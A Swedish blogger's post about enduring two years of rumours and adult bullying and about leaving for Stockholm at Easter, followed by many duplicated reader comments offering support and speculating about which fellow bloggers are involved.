Mot Sthlm…

8C65CF79-26DF-4082-8760-F4B6B6C75497

What goes around comes around” đŸ–€đŸŽ¶

-Visst Àr det vÀl ÀndÄ sÄ?!

I snart tvĂ„ Ă„r har jag stĂ„tt fast vid min stĂ„ndpunkt. Inte svarat pĂ„ alla frĂ„gor. Inte  försvarar mig mot alla trĂ„dar med bullshit som skrivits om mig pĂ„ nĂ€tet. Det ena vĂ€rre Ă€n det andra 😂

Utan substans, utan nĂ„got konkret ”hemskt” som jag faktiskt skulle ha gjort. Bara tomma rykten och anklagelser som kom ifrĂ„n att ”nĂ„n sa, att hon sa, att hon gjort” lite likt en viskningslek men i vuxenmobbning. -VIDRIGT!

Jag har svalt, svalt och svalt. StÄtt över, och försökt att inte kÀnslomÀssigt gÄ sönder. För jag ljuger om jag inte sÀger att det har gjort ont.

Samarbetspartner och vÀnner har fÄtt ultimatum stÀllda mot sig, vÀlj bort My eller ta konsekvenserna. SjÀlvklart blev blev det en brutal rensning. En ofrivillig rensning som gjorde ont. Speciellt dÀr och dÄ.

Med lite distans till det sÄ var det den bÀsta rensningen som kunde gjorts. Det gjorde ont sÄ in i h*elvete! Men samtidigt sÄ vet jag vilka jag har. Och vilka som jag inte vill ha i mitt liv.

Ingenting mer Ă€n just större insikt i vilka som Ă€r ”pĂ„ riktigt” och inte.  Jag Ă€r SÅ tacksam över dom VÄNNERNA som jag har i mitt liv â€ïžđŸ™đŸ»

4CB78AD5-67B7-4C53-B543-E133DD289360

Det mest komiska Ă€r att det fortfarande pĂ„gĂ„r. Att samma ultimatum fortfarande stĂ€lls. Nu idag mars/april 2018?!😂

Trots snart tvÄ Är passerat!?!

Trots att jag utan motstĂ„nd, utan att faktisk tagit  bladet ifrĂ„n min mun och berĂ€tta vad som egentligen hĂ€nde. TROTS det sĂ„ pĂ„gĂ„r det fortfarande, i min nĂ€rhet…. 

Vad Ă€r ”hen” ute efter? Att sĂ„ra? Att förstöra? Att hindra mig och Jonas frĂ„n att gifta oss? 

-och den stora frĂ„gan… Why?!!!

 Som jag sagt förut….”What goes aaround, comes around”  

Det enda jag vill, Ă€r att bli lĂ€mnar ifred! FĂ„ göra min grej…fĂ„ mĂ„ bra đŸ™đŸ» Och fortsĂ€tta bygga upp den fantastiska familj som jag och Jonas skapar ❀ Bara vara ifred…..

Mysdag pÄ ön igÄr.

En skön sovmorgon idag. SÄ ubÄt jag redo för roadtripp!

Lilleman Ă€r uppe i pulkabacken och leker med Alexander. (Grann pojken) och deras familj! â˜ș

Passade perfekt att han fick busa av sig utomhus, i solen och det vackra vinterland som Ă€r tillbaka… Men det töar nig bort snart. Solen skiner och det Ă€r +2😎

F83F6A71-00A7-4C1E-8423-15370A415A75

jag packar, och Laddar om inför pĂ„sklov med Lilleman och Jonas ❀

Nu Mot Sthlm…

DCEE98F6-74F5-40F4-B509-BFC7F7BC397A 5A279D25-7D30-4A6E-B57E-BBF2005B9008 43345CD2-31DF-460C-8FBC-F5FD63B7481B

Stor kram 💖

/My Martens

95 Komentarer

 1. Hej My har lÀst din blogg lÀnge o tycker du skriver bra ! Varför inte berÀtta? Kan inte se ngt inlÀgg att du har berÀttat? Kör försiktigt kram

 2. Hej My.
  Att dom bara orkar hÄlla pÄ.
  Men tydligen har dom inte nÄgot eget liv utan mÄste förstöra för andra.
  FortsÀtt som du gör. Du Àr pÄ rÀtt vÀg och fixar det.
  Kör nu försiktigt.
  Kram L

 3. Jag har mÄnga gÄnger undrat.
  Varför Ă€r sĂ„ mĂ„nga ”taskiga” mot
  My?
  My kritiseras tydligen för allt hon
  gör.
  ???

 4. Hej My har lÀst din blogg lÀnge o tycker du skriver bra ! Varför inte berÀtta? Kan inte se ngt inlÀgg att du har berÀttat? Kör försiktigt kram

 5. Och tÀnk pÄ alla bra mÀnniskor som du Ànnu inte mött. Det Àr en bra tanke tycker jag. Ha en fin vecka. Kram.

 6. Hej My.
  Att dom bara orkar hÄlla pÄ.
  Men tydligen har dom inte nÄgot eget liv utan mÄste förstöra för andra.
  FortsÀtt som du gör. Du Àr pÄ rÀtt vÀg och fixar det.
  Kör nu försiktigt.

  Kram L

 7. NĂ€men assĂ„, hĂ„lls det pĂ„ med smutskastning Ă€nnu? Är det ens nĂ„gon som orkar höra pĂ„ den mĂ€nniskan i sĂ„ fall? FĂ„r en kĂ€nsla av att det Ă€r nĂ„gon som fastnat i det gamla eller kanske har det jobbigt med nĂ„got annat, sĂ„ blir du den perfekta katalysatorn att dra bort sitt fokus till…. Du gör klokt i att fortsĂ€tta vara tyst och lĂ„tsas som det regnar, allt annat gör att den andra sidan spelas i hĂ€nderna. Det Ă€r ju vansinnigt barnsligt, dramaqueen-aktigt och uppmĂ€rksamhetstörstande att hĂ„lla pĂ„ sĂ„dĂ€r, lite som att vara som den vĂ€rsta mafioson i medelĂ„ldern. Personen i frĂ„ga kanske skulle Ă€gna sig Ă„t nĂ„got mer sjĂ€lvutvecklande som att plugga nĂ„t eller gĂ„ en drejarkurs och dreja av sig frustrationen. Jag har förstĂ„tt att man behöver sparka som tusan pĂ„ den dĂ€r skivan för att fĂ„ den att snurra…. Se det vore en mer konstruktiv variant Ă€n att med undertryckt ilska baktala andra. ? Ha en fin dag! Kram!

 8. Jag har mÄnga gÄnger undrat.
  Varför Ă€r sĂ„ mĂ„nga ”taskiga” mot
  My?
  My kritiseras tydligen för allt hon
  gör.
  🌞🌞🌞

 9. NĂ€r du undrar vad ”hen” Ă€r ute efter sĂ„ menar du att en enda person kan pĂ„verka ditt liv? Vet att du inte kommer att nĂ€mna nĂ„got namn, men kan inte se att nĂ„n enskild person skulle ha sĂ„n makt. Finns det inget du kan göra juridiskt?

 10. Och tÀnk pÄ alla bra mÀnniskor som du Ànnu inte mött. Det Àr en bra tanke tycker jag. Ha en fin vecka. Kram.

 11. NĂ€men assĂ„, hĂ„lls det pĂ„ med smutskastning Ă€nnu? Är det ens nĂ„gon som orkar höra pĂ„ den mĂ€nniskan i sĂ„ fall? FĂ„r en kĂ€nsla av att det Ă€r nĂ„gon som fastnat i det gamla eller kanske har det jobbigt med nĂ„got annat, sĂ„ blir du den perfekta katalysatorn att dra bort sitt fokus till…. Du gör klokt i att fortsĂ€tta vara tyst och lĂ„tsas som det regnar, allt annat gör att den andra sidan spelas i hĂ€nderna. Det Ă€r ju vansinnigt barnsligt, dramaqueen-aktigt och uppmĂ€rksamhetstörstande att hĂ„lla pĂ„ sĂ„dĂ€r, lite som att vara som den vĂ€rsta mafioson i medelĂ„ldern. Personen i frĂ„ga kanske skulle Ă€gna sig Ă„t nĂ„got mer sjĂ€lvutvecklande som att plugga nĂ„t eller gĂ„ en drejarkurs och dreja av sig frustrationen. Jag har förstĂ„tt att man behöver sparka som tusan pĂ„ den dĂ€r skivan för att fĂ„ den att snurra…. Se det vore en mer konstruktiv variant Ă€n att med undertryckt ilska baktala andra. 🙂 Ha en fin dag! Kram!

 12. Hej My! SlÀpp energitjuvarna och fokusera pÄ dig och din familj. Inte ens vÀrda att kommentera eftersom det bara göder dessa mÀnniskor ondska Ànnu mer. Du Àr vÀrd sÄ mycket mer. Kram

 13. Ja my, det Àr vidrigt allt! Oavsett om du gjort nÄt vad det Àn Àr, tror jag hörde pÄ din pod nÄn gÄng om vad de var som du berÀttade dÄ o ja bara hemma ok, vad de bara detta? Och allt de hatet du fÄtt stÄ ut med för de? Helt otroligt!! VÀrre Àn att du mördat nÄgon typ. Mobbing Àr vad det Àr o ingenting annat frÄn ynkliga mÀnniskor.
  Önskar dig ett fantastiskt liv med dina nĂ€ra o kĂ€ra pĂ„ alla de vis! Stor kram!

 14. HĂ„lls det pĂ„ Ă€nnu? Jag har slutat lĂ€sa deras bloggar för lĂ€nge sedan sĂ„ jag har inget mĂ€rkt. Men My dessa ”vĂ€nner” du blev av med var absolut inte bra för dig. Du var nog den sista som mĂ€rkte det tyvĂ€rr. Nu har du folk runt dig som Ă€r en helt annan klass pĂ„. Skönt. Kram.

 15. NĂ€r du undrar vad ”hen” Ă€r ute efter sĂ„ menar du att en enda person kan pĂ„verka ditt liv? Vet att du inte kommer att nĂ€mna nĂ„got namn, men kan inte se att nĂ„n enskild person skulle ha sĂ„n makt. Finns det inget du kan göra juridiskt?

 16. Vuxenmobbning Ă€r hemsk. Är sjĂ€lv utsatt för de pĂ„ alltför nĂ€ra hĂ„ll sĂ„ svĂ„rt att komma undan. Lider vĂ€ldigt mkt utav de varje dag men tĂ€nker oxĂ„ att nĂ„n dag sĂ„ slĂ„r nog karma till och inte att jag vill ont trots den smĂ€rta jag fĂ„r utstĂ„ men iaf nĂ„n slags upprĂ€ttelse sĂ„ jag sjĂ€lv fĂ„r den sinnesro som jag tyvĂ€rr inte lyckas fĂ„.
  StĂ„ pĂ„ Dig My ?? Kram ❀

 17. Hej My! SlÀpp energitjuvarna och fokusera pÄ dig och din familj. Inte ens vÀrda att kommentera eftersom det bara göder dessa mÀnniskor ondska Ànnu mer. Du Àr vÀrd sÄ mycket mer. Kram

 18. Ja my, det Àr vidrigt allt! Oavsett om du gjort nÄt vad det Àn Àr, tror jag hörde pÄ din pod nÄn gÄng om vad de var som du berÀttade dÄ o ja bara hemma ok, vad de bara detta? Och allt de hatet du fÄtt stÄ ut med för de? Helt otroligt!! VÀrre Àn att du mördat nÄgon typ. Mobbing Àr vad det Àr o ingenting annat frÄn ynkliga mÀnniskor.

  Önskar dig ett fantastiskt liv med dina nĂ€ra o kĂ€ra pĂ„ alla de vis! Stor kram!

 19. HĂ„lls det pĂ„ Ă€nnu? Jag har slutat lĂ€sa deras bloggar för lĂ€nge sedan sĂ„ jag har inget mĂ€rkt. Men My dessa ”vĂ€nner” du blev av med var absolut inte bra för dig. Du var nog den sista som mĂ€rkte det tyvĂ€rr. Nu har du folk runt dig som Ă€r en helt annan klass pĂ„. Skönt. Kram.

 20. Trist att det fortfarande pĂ„gĂ„r……… Men jag har faktiskt inte heller sett att du har skrivit om vad det var som hĂ€nde dĂ„ egentligen. Kan du inte skriva en gĂ„ng till?

 21. Vet att jag stĂ€llt frĂ„gan tidigare, men nu har det ju gĂ„tt ett bra tag och den ligger fortfarande ute… vore det inte lĂ€ge att slĂ€cka ner/avsluta hemsidan för MyÂŽs Blommor?
  Kanske inte spelar nÄgon roll egentligen. TÀnker bara att det Àr lite onödigt att den finns kvar med bilder pÄ dig och personal osv, nÀr butiken Àr stÀngd sedan ganska lÄng tid tillbaka.

 22. Vuxenmobbning Ă€r hemsk. Är sjĂ€lv utsatt för de pĂ„ alltför nĂ€ra hĂ„ll sĂ„ svĂ„rt att komma undan. Lider vĂ€ldigt mkt utav de varje dag men tĂ€nker oxĂ„ att nĂ„n dag sĂ„ slĂ„r nog karma till och inte att jag vill ont trots den smĂ€rta jag fĂ„r utstĂ„ men iaf nĂ„n slags upprĂ€ttelse sĂ„ jag sjĂ€lv fĂ„r den sinnesro som jag tyvĂ€rr inte lyckas fĂ„.

  StĂ„ pĂ„ Dig My đŸ‘ŠđŸ» Kram ❀

 23. Det hĂ€r kanske inte med ditt inlĂ€gg att göra, men jag tycker det Ă€r mĂ€rkligt att Magdalena skriver pĂ„ Linda Thelenius insta…kĂ€nner dem
  varandra !?
  Det Ă€r ju din Jonas nĂ€ra vĂ€nner, sĂ„ det Ă€r vĂ€l inte sĂ„ kul att M Ă€r dĂ€r och kommenterar hur söt deras son Ă€r…
  Stor Kram till dig!

 24. Trist att det fortfarande pĂ„gĂ„r……… Men jag har faktiskt inte heller sett att du har skrivit om vad det var som hĂ€nde dĂ„ egentligen. Kan du inte skriva en gĂ„ng till?

 25. Vet att jag stĂ€llt frĂ„gan tidigare, men nu har det ju gĂ„tt ett bra tag och den ligger fortfarande ute… vore det inte lĂ€ge att slĂ€cka ner/avsluta hemsidan för MyÂŽs Blommor?
  Kanske inte spelar nÄgon roll egentligen. TÀnker bara att det Àr lite onödigt att den finns kvar med bilder pÄ dig och personal osv, nÀr butiken Àr stÀngd sedan ganska lÄng tid tillbaka.

 26. Vem Àr det som kan hindra dig och Jonas at gifta Er Kram
  HÀr Àr mÄnga som stödjar er

 27. Det hĂ€r kanske inte med ditt inlĂ€gg att göra, men jag tycker det Ă€r mĂ€rkligt att Magdalena skriver pĂ„ Linda Thelenius insta…kĂ€nner dem
  varandra !?
  Det Ă€r ju din Jonas nĂ€ra vĂ€nner, sĂ„ det Ă€r vĂ€l inte sĂ„ kul att M Ă€r dĂ€r och kommenterar hur söt deras son Ă€r…
  Stor Kram till dig!

 28. Vem Àr det som kan hindra dig och Jonas at gifta Er Kram
  HÀr Àr mÄnga som stödjar er

 29. ”What goes around comes around” betyder ju att den aom gjort nĂ„got fĂ„r tillbaks med samma mynt/blir utsatt för samma sak, det kan jag dĂ„ Ă€ndĂ„ inte tro hĂ€r? SlĂ€pp detta My de Ă€r inte vĂ€rda detta och sĂ„ svĂ„rt för oss att förhĂ„la oss till nĂ€r vi inte vet vad som har hĂ€nt.
  (Är inte info i din header gammal nu). Ha en bra dag.

 30. ”What goes around comes around” betyder ju att den aom gjort nĂ„got fĂ„r tillbaks med samma mynt/blir utsatt för samma sak, det kan jag dĂ„ Ă€ndĂ„ inte tro hĂ€r? SlĂ€pp detta My de Ă€r inte vĂ€rda detta och sĂ„ svĂ„rt för oss att förhĂ„la oss till nĂ€r vi inte vet vad som har hĂ€nt.
  (Är inte info i din header gammal nu). Ha en bra dag.

  • Nej man behöver inte glömma stora saker. Men man hĂ€mnas inte eller försöker göra nĂ„gon illa för det.
   DÄ har man nog inte alla sina bollar samlade i samma lÄda om man sÀger sÄ;)

 31. Hej My!
  Vissa av oss lÀsare, JAG, förstÄr inte vad du menar och vad det Àr nÀr du skriver sÄna hÀr inlÀgg. Du har gjort det lite dÄ och dÄ och jag som inte hÀnger med i alla bloggar blir vÀldigt förvirrad. Vem gör illa vem och vaddÄ fortsÀtter ff efter 2 Är? Om nÄgon nu gjort eller sagt nÄtt för 2 Är sen, Àr det inte lÀge att gÄ vidare dÄ eller prata ut om saken? Vuxna Àr fan vÀrre Àn barn och barn kan vara sÄ jÀkla elaka, men det Àr vÀl det dom lÀr sig av dom vuxna. Jag hatar kÀrringar och Àr en kÀrring sjÀlv för fasiken vad kÀrringar kan snacka skit. Kanske du ska sÀga nÄtt Ät oss som inte vet ett dugg om du ska lÀgga in sÄna hÀr inlÀgg. Vem och vilka gÀller det? Skrivs det inget sÄ finns det inget. SÄ kÀnner jag, för i dom bloggar jag lÀser och följer sÄ skriver ingen om dig. DÀrför blir det lite konstigt. För en som inget vet.

  • Jag undrar litegrann detsamma faktiskt. Nu lĂ€ser inte jag sĂ„ mĂ„nga bloggar men om det Ă€r andra bloggerskor som hoppar pĂ„ dig My dĂ„ skulle jag ta det med de som har deras portaler.
   Är det samma hela tiden sĂ„ tror jag nog jag skulle konfrontera dem öga mot öga ocksĂ„.
   Jag tycker det hĂ€r Ă€r rent bedrövligt och sjĂ€lvklart undrar man VEM som har sĂ„n ”makt” att de tror sig kunna pĂ„verka dina samarbetspartners.
   NÀstan sÄ man tycker du borde hÀnga ut dem pÄ din blogg eftersom de tydligen tycker det Àr Ok hoppa pÄ dig.
   MÀnniskor Àr hemska. Man kan ha olika Äsikter men frÄn det till att bli elak Àr det ganska lÄngt ( i alla fall i min vÀrld )
   Kram

   • Jag hĂ„llet med dig…. Du och jag tex, ha olika Ă„sikter… och kan vara överens om det. Problemet hĂ€r Ă€r att ”hen” har fen makten. Störst statestik och en makt genom att majoriteten drar sig gör att bli osams med hen.. pga av följderna… :/ Men att hĂ€nga ut ”hen” med bihang hĂ€r inne har jag undvikit. Vill inte göra sĂ„… frĂ€mst för barnen och familjernas skull. Men allting gĂ„r till en grĂ€ns.. det enda jag vill Ă€r att bli lĂ€mnad ifred ??

 32. All styrka och kÀrlek till dig My!
  TyvĂ€rr sĂ„ finns det ”smĂ„” mĂ€nniskor hĂ€r i vĂ€rlden.
  Det Àr deras förlust och inte din.
  De kan inte mÄ sÄ bra innerst inne.
  Kram
  ❀

 33. Men My, nÀr man har en blogg dÀr man blottar sitt liv mÄste man förstÄ att folk reagerar pÄ olika sÀtt., en del elakt och en del insmickrande och gulligulligt.
  Jag lÀser nÄgra bloggar ibland, din bland annat. Eftersom du sÀger A men inte B ganska ofta sÄ blir det ju sÄ att folk hoppar pÄ dig. TyvÀrr..
  Om jag vore du skulle jag sluta blogga, det kan ju bli sÄ mycket fel nÀr hela vÀrlden kan lÀsa om allt.
  Men dÄ mister du förstÄs en inkomst men du har ju annat jobb ocksÄ nÀr du blir mÀklare. Hur gÄr det med den utbildningen förresten ? LÀnge sen du uppdaterade det.
  Ha nu en fin tid i Sthlm och koppla av bloggen. Kram

  • SĂ„ du tycker att jag ska sluta blogga för att andra bloggare ”hoppar pĂ„ mig”. Jag har lagt 4.5 Ă„r pĂ„ att bygga upp bloggen, trots dyslexi och bristande teknisk kunskap frĂ„n början… jag jobbar med min blogg, det kommer jag att fortsĂ€tta göra ? jag ör tilt att jag kommit upp till en av Sveriges topp 20. Det har inte varit enkelt, men otroligt utvecklandeâ˜ș MĂ€klarutbildningen och kommande jobb kommer att bli ett komplement till bloggen. MĂ„nga mĂ€klare kĂ€mpar med att bygga upp sociala medier. För idag behöver i stort sett alla branscher och yrken just det. SjukvĂ„rden, skolor, organisationer, tv, radio, tidningar ja… du fattar. Jag kommer ifrĂ„n socialamedia branchen och kommer göra tvĂ€rt om. Men sluta blogga, för att andra bloggare attackerar och fryser ut mig… nej, det kommer inte ske. Jag har nĂ€stan 80000 mĂ€nniskor som lĂ€ser min blogg, sjĂ€lvklart kan jag inte förvĂ€ntar mig att all ska tycka om mig. Men att veta att jag inspirerar och peppar vissa, det rĂ€cker gott för mig?? Tack för din fina omtanke ??❀ Kramis

  • Nej man behöver inte glömma stora saker. Men man hĂ€mnas inte eller försöker göra nĂ„gon illa för det.
   DÄ har man nog inte alla sina bollar samlade i samma lÄda om man sÀger sÄ;)

 34. Hej My!

  Vissa av oss lÀsare, JAG, förstÄr inte vad du menar och vad det Àr nÀr du skriver sÄna hÀr inlÀgg. Du har gjort det lite dÄ och dÄ och jag som inte hÀnger med i alla bloggar blir vÀldigt förvirrad. Vem gör illa vem och vaddÄ fortsÀtter ff efter 2 Är? Om nÄgon nu gjort eller sagt nÄtt för 2 Är sen, Àr det inte lÀge att gÄ vidare dÄ eller prata ut om saken? Vuxna Àr fan vÀrre Àn barn och barn kan vara sÄ jÀkla elaka, men det Àr vÀl det dom lÀr sig av dom vuxna. Jag hatar kÀrringar och Àr en kÀrring sjÀlv för fasiken vad kÀrringar kan snacka skit. Kanske du ska sÀga nÄtt Ät oss som inte vet ett dugg om du ska lÀgga in sÄna hÀr inlÀgg. Vem och vilka gÀller det? Skrivs det inget sÄ finns det inget. SÄ kÀnner jag, för i dom bloggar jag lÀser och följer sÄ skriver ingen om dig. DÀrför blir det lite konstigt. För en som inget vet.

  • Jag undrar litegrann detsamma faktiskt. Nu lĂ€ser inte jag sĂ„ mĂ„nga bloggar men om det Ă€r andra bloggerskor som hoppar pĂ„ dig My dĂ„ skulle jag ta det med de som har deras portaler.
   Är det samma hela tiden sĂ„ tror jag nog jag skulle konfrontera dem öga mot öga ocksĂ„.
   Jag tycker det hĂ€r Ă€r rent bedrövligt och sjĂ€lvklart undrar man VEM som har sĂ„n ”makt” att de tror sig kunna pĂ„verka dina samarbetspartners.
   NÀstan sÄ man tycker du borde hÀnga ut dem pÄ din blogg eftersom de tydligen tycker det Àr Ok hoppa pÄ dig.
   MÀnniskor Àr hemska. Man kan ha olika Äsikter men frÄn det till att bli elak Àr det ganska lÄngt ( i alla fall i min vÀrld )
   Kram

   • Jag hĂ„llet med dig…. Du och jag tex, ha olika Ă„sikter… och kan vara överens om det. Problemet hĂ€r Ă€r att ”hen” har fen makten. Störst statestik och en makt genom att majoriteten drar sig gör att bli osams med hen.. pga av följderna… :/ Men att hĂ€nga ut ”hen” med bihang hĂ€r inne har jag undvikit. Vill inte göra sĂ„… frĂ€mst för barnen och familjernas skull. Men allting gĂ„r till en grĂ€ns.. det enda jag vill Ă€r att bli lĂ€mnad ifred đŸ™đŸ»

 35. All styrka och kÀrlek till dig My!
  TyvĂ€rr sĂ„ finns det ”smĂ„” mĂ€nniskor hĂ€r i vĂ€rlden.
  Det Àr deras förlust och inte din.
  De kan inte mÄ sÄ bra innerst inne.
  Kram
  ❀

 36. Men My, nÀr man har en blogg dÀr man blottar sitt liv mÄste man förstÄ att folk reagerar pÄ olika sÀtt., en del elakt och en del insmickrande och gulligulligt.
  Jag lÀser nÄgra bloggar ibland, din bland annat. Eftersom du sÀger A men inte B ganska ofta sÄ blir det ju sÄ att folk hoppar pÄ dig. TyvÀrr..
  Om jag vore du skulle jag sluta blogga, det kan ju bli sÄ mycket fel nÀr hela vÀrlden kan lÀsa om allt.
  Men dÄ mister du förstÄs en inkomst men du har ju annat jobb ocksÄ nÀr du blir mÀklare. Hur gÄr det med den utbildningen förresten ? LÀnge sen du uppdaterade det.
  Ha nu en fin tid i Sthlm och koppla av bloggen. Kram

  • SĂ„ du tycker att jag ska sluta blogga för att andra bloggare ”hoppar pĂ„ mig”. Jag har lagt 4.5 Ă„r pĂ„ att bygga upp bloggen, trots dyslexi och bristande teknisk kunskap frĂ„n början… jag jobbar med min blogg, det kommer jag att fortsĂ€tta göra 😄 jag ör tilt att jag kommit upp till en av Sveriges topp 20. Det har inte varit enkelt, men otroligt utvecklandeâ˜ș MĂ€klarutbildningen och kommande jobb kommer att bli ett komplement till bloggen. MĂ„nga mĂ€klare kĂ€mpar med att bygga upp sociala medier. För idag behöver i stort sett alla branscher och yrken just det. SjukvĂ„rden, skolor, organisationer, tv, radio, tidningar ja… du fattar. Jag kommer ifrĂ„n socialamedia branchen och kommer göra tvĂ€rt om. Men sluta blogga, för att andra bloggare attackerar och fryser ut mig… nej, det kommer inte ske. Jag har nĂ€stan 80000 mĂ€nniskor som lĂ€ser min blogg, sjĂ€lvklart kan jag inte förvĂ€ntar mig att all ska tycka om mig. Men att veta att jag inspirerar och peppar vissa, det rĂ€cker gott för migđŸ™đŸ» Tack för din fina omtanke đŸ™đŸ»â€ïž Kramis

 37. Vilka bloggar talar du om för Johanna Tofby, Magdalena Graafs, Madeleine Ilmruds, bloggar lÀser jag och jag har inte sett nÄgot illa skrivit om dig. En snÀll undran bara.

  • Ann 17:17 DĂ„ har du inte hĂ€ngt med i bloggarna och komentarsfĂ€ltet. Massa Ă€r raderat men gissar att ”nĂ„gon” har kopierat ?

   • All inlĂ€gg frĂ„n tidigare finns kvar. 40-50 sidor skvaller sidor med rent förtal.. litter ute. Men denna gĂ„ngen handlar det om vĂ€rre Ă€n skitsnack pĂ„ nĂ€tet. Som jag skrev, ”samma ultimatum stĂ€lls idag” jag har inte skrivit om nĂ„gra elaka blogginlĂ€gg, dessa skiter jag fullstĂ€ndig i! Men nĂ€r mina egna vĂ€nner inte fĂ„r trĂ€ffa mig, eller samarbetspartner sĂ„ tycker jag att det gĂ„tt för lĂ„ngt… mitt budskap med mitt inlĂ€gg. = lĂ€mna mig ifred… thats it!

    • Men wtf!!!! Dina vĂ€nner har vĂ€l ett eget val och umgĂ„s vĂ€l med dig om dom vill!
     Vilken sandlÄdenivÄ och stÀlla kravet att fortsÀtter du trÀffa My sÄ Àr du ute i kylan, vilka dumheter!
     KĂ€mpa pĂ„ och s…t i idioterna!

    • DĂ„ Ă€r det inga vĂ€nner att ha. En vĂ€n som gĂ„r med pĂ„ ett sĂ„dant ultimatum Ă€r ingen vĂ€n utan en feg individ.
     Var vÀl likadant med Mona hon fick inte nÀmna Maggan som sin vÀn. MisstÀnker att det Àr samma hÀr. Maggan var vÀl fruktansvÀrt ovÀn med sin syrra i flera Är. Det sÀger rÀtt mycket om en person inte kan gÄ vidare och förlÄta (och hon utger sig ÀndÄ för att vara kristen).
     Pinsamt att vissa saker som skenhelighet lyser igenom sÄ starkt.

 38. en reflektion i all vÀlmening.
  Har ni som Àr berörda i det hÀr nÄgon gÄng försökt att prata ut om det som hÀnt?
  alla gör fel ibland trots att vi Àr vuxna och förvÀntas vara förstÄndiga.
  Vi hanterar konflikter och svek pÄ olika sÀtt beroende pÄ vad som prÀglat oss tidigare
  Jag försöker INTE leka amatörpsykolog men hela den hÀr soppan kÀnns sÄ onödig, vÀnskap tar slut ibland ( tyvÀrr)
  Man mÄste sÀtta punkt och gÄ vidare , fÄ ett avslut.
  TrÄkigt att dina samarbetspartner backar och tar parti ( OBS min tolkning) jag tÀnker att personen som stÄr pÄ andra sidan dvs ocksÄ har /har haft samarbete med samma företag mÄste kÀnna sig oerhört sÄrad och krÀnkt
  och dĂ€rför kanske det skulle vara bra att prata, komma till ett avslut….
  Jag förstĂ„r att du inte kan skriva ut allt pĂ„ bloggen, och jag tror med betoning pĂ„ tror att du vet nĂ„gonstans varför ” hen” Ă€r sĂ„ besviken pĂ„ dig och fortfarande har svĂ„rt att ”
  Vistas i samma rum”
  Det Àr inte bara du som Àr sviken och lÀmnad, motparten kÀnner nog ocksÄ sÄ
  Allt man kan göra Àr att rannsaka sig sjÀlv, stÄ för felaktiga beslut och ageranden , be om ursÀkt.
  Sen mÄste man gÄ vidare, sorg över förlorad vÀnskap kanske kommer göra ont hela livet, men viktigt att komma ihÄg att en gÄng var man sÄ glad över att den fanns.
  Att ” insinuera” och ” hinta” sĂ€ga A men inte B , gĂ„ng efter gĂ„ng pĂ„peka att du av hĂ€nsyn inte tar bladet frĂ„n munnen tror jag skadar dig mer Ă€n gynnar dig (möjligtvis ökar trafiken till bloggen och det Ă€r ju bra)
  Det blir onödiga spekulationer och kĂ€nns mer som om att du försöker skydda dig mot ev ”
  LĂ€ckage” frĂ„n annan blogg-kollega.
  Har du gjort allt du kunnat för att göra det bra, sagt förlÄt men inte fÄtt nÄgon respons ja dÄ tror jag att det Àr bÀst att gÄ vidare och ta med sig de fina minnena
  Trevlig kvÀll pÄ dig!

  • Word!! Exakt sĂ„. Att ”sĂ€ga A men inte B” gör att folk fortsĂ€tter att klicka in hĂ€r och eftersom det genererar pengar sĂ„ fortsĂ€tter de inlĂ€ggen att komma men det spĂ€r ju ocksĂ„ pĂ„ skitsnacket.
   Jag klickar in hĂ€r max en gĂ„ng i veckan nu för man orkar liksom inte mer, skummar de första raderna och Ă€r det Ă€nnu ett ”sĂ„nt” inlĂ€gg sĂ„ stĂ€nger jag ner sidan.
   Jag följer bloggar för att bli inspirerad och peppad, men hĂ€r Ă€r det bara ”hemligheter” och kryptiska inlĂ€gg numera. Trist!
   My, jag diggar dig men orkar inte lÀsa mer sÄnt hÀr nu. Sorry! Kram

 39. Vilka bloggar talar du om för Johanna Tofby, Magdalena Graafs, Madeleine Ilmruds, bloggar lÀser jag och jag har inte sett nÄgot illa skrivit om dig. En snÀll undran bara.

  • Ann 17:17 DĂ„ har du inte hĂ€ngt med i bloggarna och komentarsfĂ€ltet. Massa Ă€r raderat men gissar att ”nĂ„gon” har kopierat 😉

   • All inlĂ€gg frĂ„n tidigare finns kvar. 40-50 sidor skvaller sidor med rent förtal.. litter ute. Men denna gĂ„ngen handlar det om vĂ€rre Ă€n skitsnack pĂ„ nĂ€tet. Som jag skrev, ”samma ultimatum stĂ€lls idag” jag har inte skrivit om nĂ„gra elaka blogginlĂ€gg, dessa skiter jag fullstĂ€ndig i! Men nĂ€r mina egna vĂ€nner inte fĂ„r trĂ€ffa mig, eller samarbetspartner sĂ„ tycker jag att det gĂ„tt för lĂ„ngt… mitt budskap med mitt inlĂ€gg. = lĂ€mna mig ifred… thats it!

    • Men wtf!!!! Dina vĂ€nner har vĂ€l ett eget val och umgĂ„s vĂ€l med dig om dom vill!
     Vilken sandlÄdenivÄ och stÀlla kravet att fortsÀtter du trÀffa My sÄ Àr du ute i kylan, vilka dumheter!
     KĂ€mpa pĂ„ och s…t i idioterna!

    • DĂ„ Ă€r det inga vĂ€nner att ha. En vĂ€n som gĂ„r med pĂ„ ett sĂ„dant ultimatum Ă€r ingen vĂ€n utan en feg individ.

     Var vÀl likadant med Mona hon fick inte nÀmna Maggan som sin vÀn. MisstÀnker att det Àr samma hÀr. Maggan var vÀl fruktansvÀrt ovÀn med sin syrra i flera Är. Det sÀger rÀtt mycket om en person inte kan gÄ vidare och förlÄta (och hon utger sig ÀndÄ för att vara kristen).

     Pinsamt att vissa saker som skenhelighet lyser igenom sÄ starkt.

 40. Jag har sett detta drev emot dig. Smutskastning pÄ en vÀldigt infantil nivÄ. Man skriver indirekt, men ÀndÄ för att utpekade vem som avses. Inga pÄfallande begÄvningar precis. Nuförtiden vet jag inte, för jag följer inte dessa personer sedan lÀnge. Helt ointressanta enligt mig, i motsats till dig. Det Àr hÀrligt att följa dig i framgÄng som motgÄng. Inga fÄnerier.
  HÀrligt att lÀsa om torpet, hÀstarna och kÀrleken.
  LÄt dem inte ta detta ifrÄn dig. Du Àr my martens, m skinn pÄ nÀsan, med ett guldhjÀrta.
  Minns nÀr en av dem skulle stajla inför mobbklubben genom att fÀlla en kommentar pÄ din blogg, som hon kÀnde sig uthÀngd för att du publicerade den ?. Hahahah. ?. Ditt svar pÄ den. SÄ jÀvla cool.
  Stor Kramis pĂ„ dig och lĂ„t ingen skita dig p nĂ€san. LĂ„t dem krysta ifred i det blĂ„ skĂ„pet…

 41. en reflektion i all vÀlmening.
  Har ni som Àr berörda i det hÀr nÄgon gÄng försökt att prata ut om det som hÀnt?
  alla gör fel ibland trots att vi Àr vuxna och förvÀntas vara förstÄndiga.
  Vi hanterar konflikter och svek pÄ olika sÀtt beroende pÄ vad som prÀglat oss tidigare
  Jag försöker INTE leka amatörpsykolog men hela den hÀr soppan kÀnns sÄ onödig, vÀnskap tar slut ibland ( tyvÀrr)
